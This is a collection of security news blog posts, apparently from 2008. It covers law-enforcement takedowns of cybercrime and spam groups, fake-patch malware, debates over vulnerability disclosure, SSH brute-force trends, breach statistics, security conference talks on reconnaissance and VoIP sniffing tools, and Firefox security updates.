FBI takes down DarkMarket cybercrime ring

The FBI says it has taken down a popular site used by carders and other criminals to exchange stolen information and credit card data, the result of a two-year-long investigation by the bureau and other international police agencies. The site, known as DarkMarket, served as a kind of hub and meeting place for low-level online criminals, the Internet equivalent of pickpockets working the local mall. The key difference being, of course, that our wonderful system of tubes allows these guys to work on a massive scale and do unprecedented damage with minimal effort. The FBI says the investigation, which involved extensive undercover work and is still ongoing in some places, resulted in 56 arrests.

The bureau also estimated that the operation prevented $70 million in economic losses.  Now, I’m certainly happy to see the FBI and other agencies around the world making a dent in the cybercrime problem. It’s a global scorpion’s nest that’s gone unaddressed for way too long. But I’m always skeptical when I see this kind of estimate thrown around with no data to back it up. I’m sure the bureau based its statement on something, but we’ll never know what it is. But, the reality is that whether the number is accurate is basically irrelevant. It could be off by an order of magnitude, and it’s still just a grain of sand on the giant cybercrime playground. Online crime is such a low-risk, high-reward activity that criminals who as little as five years ago would have been selling drugs or running kidnapping rings are now setting up dozens of loosely organized online crime cells around the world, and raking in millions in virtually risk-free profits. Not good times.

The FBI knows this very well, but it also knows the psychological value of making even a small dent in the global cybercrime infrastructure. It’s a method that has served the bureau well in its decades-long fight against traditional organized crime: take down the lower-level guys and then use them as leverage to work your way up the ladder. Cybercrime is obviously a different animal, with its worldwide scope and loose, fluid structure. But progress is progress, no matter how small.

UPDATE: Kevin Poulsen on Wired’s  Threat Level blog has an excellent post about this investigation, which lays out the evidence that the FBI’s cybercrime group itself was running DarkMarket for the last two years.

Alleged operators of HerbalKing spam gang indicted

The FTC on Tuesday dropped the hammer on a group of alleged spammers who are notorious in the antispam community for their persistence and prolificness. The commission was successful in getting a U.S. District Court to indict two members of the HerbalKing spam gang, and also got the court to issue an injunction freezing the men’s assets. The FTC alleges that the two defendants, Lance Atkinson and Jody Smith, were responsible for sending billions of spam messages advertising the usual array of herbal remedies, male enhancement products and prescription drugs. From the commission’s announcement of the indictment:

The Federal Trade Commission has received more than three million complaints about spam messages connected to this operation, and estimates that it may be responsible for sending billions of illegal spam messages. At the request of the FTC, the court has issued a temporary injunction prohibiting defendants from spamming and making false product claims, and has frozen the defendants’ assets to preserve them for consumer redress pending trial. Authorities in New Zealand also have taken legal action, working in tandem with the FTC.

According to papers filed with the court, the defendants deceptively marketed a variety of products through spam messages, including a male-enhancement pill, prescription drugs and a weight-loss pill.

Spamhaus, the organization that tracks spammers and keeps a list of all the known spammers online, said that the HerbalKing group had been the most prolific spammers in the world for most of 2007 and 2008 and had been working since 2005. The group also said that despite the indictments and asset seizures on Tuesday, the gang’s spam activities have continued unabated in the last 24 hours, most likely because much of the operation is automated through the use of botnets. And, Spamhaus officials said, “Spammers such as this gang and the Russians, Indians and others they work with care little about the law. Spamhaus notes that most will not quit spamming until they are behind bars.”

Haxdoor malware circulating via fake Microsoft patch

There is a fake Microsoft patch email making the rounds, timed nicely to coincide with the release of the latest set of updates from the software giant yesterday. Known as Haxdoor, the malware arrives in an email designed to look like an official communication from Microsoft, albeit with some pretty obvious spelling and grammatical errors. The clearest indicator might be that the patch is allegedly for “05 Windows.” (Maybe it was targeted at Vista’s original release date.) Once a user opens the file (KB589770.exe), which has a fake PGP signature, it drops a slew of files onto his machine. It then changes several registry keys and then establishes connections to two remote websites. Nothing good is coming from that.

This malware is another step down the path blazed by all of the fake antivirus programs that have been polluting inboxes for the last few months. I would hope that at this point, most enterprises are blocking executables at the gateway, which would prevent a lot of the headaches these things can cause. But if not, there’s no time like the present to start.

Can Kaminsky prevent partial disclosure?

The past few months have seen a lot of activity around some really serious Internet-level vulnerabilities, starting with the problems in the DNS system that Dan Kaminsky found, and continuing with the clickjacking attacks from Robert Hansen and Jeremiah Grossman, and the recent news of new DoS attacks on the TCP stack by Robert E. Lee and Jack C. Louis. Each of these problems got a lot of attention in the press and in the vendor and research communities, and rightly so. They’re all serious problems. But they all have one other thing in common: They were all the subjects of so-called partial disclosure efforts. In each case, some details of the vulnerability were released, and then the researchers involved said that the problems were too serious to discuss fully until patches, workarounds or other fixes were available.

This disclosure model — whether it’s intentional or accidental — is clearly not the optimal way to handle new vulnerabilities.  Ideally, a researcher finds a bug, tells the affected vendors, who then produce patches in a timely manner and the details come out later. Everyone lives happily ever after. But it doesn’t always work that way. Sometimes word of the bug leaks out (Kaminsky’s DNS flaw), and sometimes the researchers deliberately reveal some details of the bug for one reason or another (clickjacking and the TCP DoS attacks). Either way, the result is often that the small bits of information available drive speculation and doomsaying, which in turn bring out the people who say this bug is: A. Nothing new; B. Not as serious as it sounds; or C. Both. Sometimes, that turns out to be the case. But other times, as in the case of the DNS flaw, the problem was not only new, but also extremely serious. But either way, the partial disclosure mode of operation exposes everyone involved to charges of fear-mongering and publicity seeking.

Now, Kaminsky is trying to halt this nascent trend by setting up a tribunal of trusted security experts – such as himself — to whom researchers can show details of bugs that they consider to be potential Internet-killers under the cover of a non-disclosure agreement. What they’ll do with the details and how they’ll disclose them if they deem the bug to be an Internet-killer isn’t clear. Here’s what Kaminsky says about his idea:

Members of this council will have to have publicly presented work in the subject area that is under consideration. I’ve spoken to a decent number of people, and everyone is somewhere between very pissed and legitimately afraid of a flood of unjustified partial disclosures.

Faced with an unending stream of “is the Internet dead yet?” Slashdot posts, everyone I’ve spoken to appears fully on board with providing an honest judgement regarding the legitimacy of findings.

Now, I expect we will reject, out of hand, almost all claims. But we will do so, with the full technical argument brought by the finder, rather than presumptions based on old flaws. Attacking the strawmen implied by partial disclosure is a losing scenario for literally everyone involved.

This is an interesting idea, especially given that it comes from Kaminsky himself, who has fallen on his sword repeatedly in the last few months for talking publicly about the DNS bug without having had anyone else in the security community review the details. (He eventually did give the details to Tom Ptacek and Dino Dai Zovi, who vouched for the seriousness of the vulnerability.) Dan’s rationale is mostly sound. He says that unless some kind of independent authority is set up to verify the claims of researchers who say they’ve found killer bugs, inevitably someone will game the system and simply do the following: claim to have a monster flaw, dole out a few juicy details to the press, then sit back while admins panic and rush off to buy security gear from the researcher’s company to fix the imaginary (or semi-real) problem.

Dan is exactly right in saying this scenario is a very real possibility. I’ve been writing about security for about eight years and I know a lot of the researchers and industry executives and other players well. I understand the technology pretty well, but I’m not an engineer or a computer scientist, so I rely on the people I talk to for explanations and context. So it’s certainly not out of the realm of possibility that a researcher could take me or any other reporter for a ride with a description of a fictional bug or attack. That’s why I check these stories with experts I know and trust. That’s the best defense.

But there’s another factor in play that I think mitigates against what Dan is worried about, and that’s the fact that any researcher pulling that kind of stunt has far more to lose than he does to gain. Let’s use Dan as an example. He has spent a lot of years building up his reputation in the security community, and people tend to take what he has to say on certain issues seriously. So if he uses that credibility in order to hype some bug that turns out to be insignificant or even imaginary, any short-term gain he would’ve gotten from the publicity would be completely wiped out by the resulting backlash. For someone who is always in the news anyway, the way that Dan is, there’s no percentage in that play. And even for an unknown researcher looking to make a name for himself, the negatives far outweigh the positives in that equation.

I agree with Dan’s premise that partial disclosure is counterproductive in most cases, but I’m not sold on the idea of a Justice League of the Internet parceling out information as it sees fit. One of the reasons why things work relatively well right now is that the specter of public embarrassment for falsely hyping a bug looms large. And that’s not likely to change anytime soon.

Mike Rothman hangs up analyst hat for new vendor job at eIQnetworks

Things in the security industry are getting curiouser and curiouser. Up is down. Black is white. Cats and dogs are living together. Mike Rothman, a ferociously independent security analyst and blogger at Security Incite, is making the leap back into the vendor world as senior vice president of strategy and chief marketing officer at eIQnetworks, a provider of a security management platform for compliance. Rothman has spent the last few years variously doing research and speaking plainly about security vendors. Before that, he spent his share of time in the vendor community, at SHYM, CipherTrust and TruSecure. Why he decided to get back into the fire, well, here’s what Rothman says:

No, I wasn’t expecting this. No, I wasn’t looking for a job. No, I didn’t “need” to. Yes, I’m probably nuts for taking another vendor job. But a number of pretty cool things came together and compelled me to make this move.

I should always remember that “never” is a very long time. Given my short attention span, the idea of “never” doing anything again is pretty silly.

What exactly Rothman will be doing as a CMO is unclear, but the one thing you can count on is that he’ll say what he thinks. And it will probably be entertaining.

More attacks on SSH passwords

It appears that SSH attacks are becoming the go-to move for lazy attackers looking to victimize lazy admins. A couple of weeks ago I wrote about some ongoing brute-force attacks against SSH implementations and now it seems that attackers are moving on to some new tactics. The Internet Storm Center has gotten a couple of reports of SSH attacks in which the attacking machines are trying to brute-force the SSH password with about 20 attempts per hour. The key here is that number of attempts falls below the threshold of the scripts usually used to detect these attempts and ban the attacking IP addresses.

Usernames are being brute forced starting at “aaa” and incremented.  This is being done in a distributed manner with almost perfect synchronization between the scanning hosts.  Over the last 32 hours, his system received 216 login attempts of which 138 attempts were from unique IP addresses.  Obviously, the attacker is trying to avoid the popular SSH banning scripts by going under the banning thresholds of these programs.  At peak, there were only 20 total attempts per hour. Note that the username guessing did not actually cover all possibilities.  Perhaps it is a bug, or by design.  The last letter was not being exhaustively tested — only about 10 of 26 letters were being tested in the last position, and it seemed to be randomly picked.

The widespread problems that have plagued SSH in the last few months are making it an attractive target for the attackers just looking to rattle doorknobs and see which ones pop open. If you haven’t already, now would be a good time to check your SSH server and make sure the password isn’t “aaa.”

Data breach study shows errors, not hacks, are the big problem

Anytime there is a notification of another data breach — which is essentially every day at this point — the details of the event tend to get washed away, and the breach is reduced to basically two pieces of information: the name of the victimized company and the number of records it lost. This leads to an assumption that all of these incidents are created equal, which is demonstrably not the case. Verizon Business on Thursday released a supplement to its June Data Breach Investigative Report, which shows that of all the breaches the company’s security response team worked on from 2004 through 2007, the majority (62%) were caused by errors and not malware or direct attacks.

The Verizon Business Supplemental Report, which breaks the incidents down by industry, found that errors were by far the largest  contributing factor in breaches in the technology industry, affecting 67% of breaches. By contrast, hacking only contributed to 45% of incidents in the tech sector. “It could rightly be said that some form of error occurs somewhere in the chain of events surrounding nearly all data breaches. While this is true, our investigators focus on errors that directly cause or significantly contribute to the incident,” the report says. With that in mind, the report shows that errors of omission are by far the largest problem, contributing to 80% of breaches in all industries.

The data in the report is fascinating and, aside from the causes of the breaches, there is plenty of fodder for further investigation. The other thing that jumped out at me is that in many of the incidents that had attacks as a contributing factor, the Verizon team found that the attack took some significant skill to execute. Across all industries, 45% of these incidents were rated either moderate or high in terms of difficulty. In the tech industry, 69% of the attacks took moderate or high skills.

I have to say that surprises me more than a little bit. Most of the experts I’ve talked to about specific incidents that they’ve been involved with have said that the attack involved was usually a low-level one, like the Wi-Fi sniffing attack that was used in the TJX breach. What this tells me, among other things, is that there is a whole lot we don’t know about these breaches, especially with regard to how they’re going down and why. More information, please.

Penetration testing without the penetration

When the subject of penetration testing and security assessments comes up, it usually conjures thoughts of highly skilled consultants deploying an array of custom tools to gather information on a target network and look for potential weak spots. But there are a number of guys out there doing these assessments who are using less-technical methods and putting the Web’s seemingly boundless stores of information to use instead. Chris Gates is one of those guys, and he gave a fascinating talk on his methods at ToorCon over the weekend, telling the audience that tools like Maltego and Metagoofil can be invaluable in gathering data on a target network.

Maltego, which finds, organizes and displays information on specific networks and reveals the relationships among companies and individual people, can be a tremendous resource, he said. “I can start with mail servers and name servers and get all the domains on those servers and then move onto netblocks,” he said.

Gate also said that programs such as email harvesters can be great sources of information on a company’s employees, as can social networking sites such as LinkedIn, Facebook and MySpace. That’s not a huge revelation, but using information gathered on those sites in conjunction with the other tools Gates talked about can lead to major caches of data on specific employees or companies in general, all of which can then be leveraged to glean more information.

Also, be sure to check out the photos of ToorCon I took this weekend.

UCSniff, new VoIP tool, allows sniffing of specific traffic

After years of hype and mostly unfulfilled promise, VoIP has begun making some headway in large enterprises. A lot of IT managers are attracted by the technology’s potential to help them save money through lower phone bills and converged services. And don’t think that the attackers haven’t noticed VoIP’s emergence. At the ToorCon conference in San Diego this weekend, Jason Ostrom, a security researcher with Sipera VIPER Lab, gave a talk that featured several tools he’s built, including VoIP Hopper, that can be used to test the security of VoIP deployments and look for potential attack vectors.

Ostrom talked about a new tool he’s developed, called UCSniff, that enables a user to monitor VoIP traffic on a network in several different ways. The most interesting and potentially useful function of UCSniff is its ability to sniff all of the conversations on a particular extension. It also can be set to passively monitor all of the VoIP traffic on a network and learn the interactions among devices, discovering which extensions belong to whom. Then, once that mapping is accomplished, the user can identify which devices he’s interested in monitoring and target those specifically.

Ostrom said he plans to port UCSniff to Windows in the near future and that it will also soon include support for the H.323 standard. Much of the threat to VoIP networks at this point has come from various denial-of-service attacks, but security experts for years have been warning that the nature of IP phones and the ways in which VoIP networks are set up could make them susceptible to traffic-sniffing attacks like the ones that Ostrom described.

Ostrom and some of his coworkers also have developed a third tool, called XTest, which can test VoIP infrastructures for security problems. XTest is designed specifically to audit wired 802.1x implementations, and can check the strength of the passwords used in these implementations through an offline EAP-MD5 dictionary attack against the password file.

Firefox 3 security fixes released

Mozilla has released new versions of both Firefox 3 and Firefox 2 that fix a slew of security vulnerabilities, including at least one critical remote code-execution flaw. Firefox 3.0.2 fixes a weakness in the latest version of the browser that enables an attacker to run code of his choice on a vulnerable machine and even install rogue software. There are also several less severe vulnerabilities addressed in version 3.0.2.

Mozilla also released an updated version of Firefox 2, the older version of the browser that many people still use. Firefox 2.0.0.17 includes fixes for several serious code-execution vulnerabilities, as well as some less-serious flaws.